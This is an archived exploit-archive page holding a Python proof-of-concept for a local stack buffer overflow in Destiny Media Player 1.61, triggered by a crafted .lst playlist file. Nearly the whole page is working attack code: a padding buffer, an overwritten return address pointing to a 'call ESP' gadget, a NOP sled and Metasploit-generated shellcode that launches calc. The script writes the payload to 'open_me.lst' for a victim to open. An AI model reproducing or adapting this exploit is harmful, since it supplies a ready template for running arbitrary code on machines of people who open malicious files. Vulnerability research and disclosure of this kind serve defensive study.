AOH :: HP Unsorted D :: VA2205.HTM

Destiny Media Player 1.61 (.lst File) Local Stack Overflow Exploit



Destiny Media Player 1.61 (.lst File) Local Stack Overflow Exploit
Destiny Media Player 1.61 (.lst File) Local Stack Overflow Exploit



print "====================================================================="
print " Destiny Media Player 1.61 (.lst File) Local Stack Overflow Exploit\n"
print " Discovered by   : Encrypt3d.M!nd"
print " exploit code by : suN8Hclf"
print " Tested on       : Windows 2000 SP4 Polish"
print " Greetings to    : 0in, Gynvael Coldwind, doctor, Katharsis, SkD"
print "====================================================================="

buffer = "\x41" * 2052
NEW_EIP = "\x33\x08\x3a\x77" #call ESP from atl.dll
nops = "\x90" * 10

# win32_exec - EXITFUNC=seh CMD=calc Size=160 Encoder=PexFnstenvSub http://metasploit.com 
shellcode = (
	"\x29\xc9\x83\xe9\xdd\xd9\xee\xd9\x74\x24\xf4\x5b\x81\x73\x13\xc9"
	"\x2c\xc9\x40\x83\xeb\xfc\xe2\xf4\x35\xc4\x8d\x40\xc9\x2c\x42\x05"
	"\xf5\xa7\xb5\x45\xb1\x2d\x26\xcb\x86\x34\x42\x1f\xe9\x2d\x22\x09"
	"\x42\x18\x42\x41\x27\x1d\x09\xd9\x65\xa8\x09\x34\xce\xed\x03\x4d"
	"\xc8\xee\x22\xb4\xf2\x78\xed\x44\xbc\xc9\x42\x1f\xed\x2d\x22\x26"
	"\x42\x20\x82\xcb\x96\x30\xc8\xab\x42\x30\x42\x41\x22\xa5\x95\x64"
	"\xcd\xef\xf8\x80\xad\xa7\x89\x70\x4c\xec\xb1\x4c\x42\x6c\xc5\xcb"
	"\xb9\x30\x64\xcb\xa1\x24\x22\x49\x42\xac\x79\x40\xc9\x2c\x42\x28"
	"\xf5\x73\xf8\xb6\xa9\x7a\x40\xb8\x4a\xec\xb2\x10\xa1\xdc\x43\x44"
	"\x96\x44\x51\xbe\x43\x22\x9e\xbf\x2e\x4f\xa8\x2c\xaa\x02\xac\x38"
	"\xac\x2c\xc9\x40"
    )

exploit = buffer + NEW_EIP + nops + shellcode
try:
    out_file = open("open_me.lst",'w')
    out_file.write(exploit)
    out_file.close()
    raw_input("\nNow open open_me.lst file to exploit bug!\n")
except:
    print "WTF?"

The entire AOH site is optimized to look best in Firefox® 3 on a widescreen monitor (1440x900 or better).
Site design & layout copyright © 1986-2014 AOH
We do not send spam. If you have received spam bearing an artofhacking.com email address, please forward it with full headers to abuse@artofhacking.com.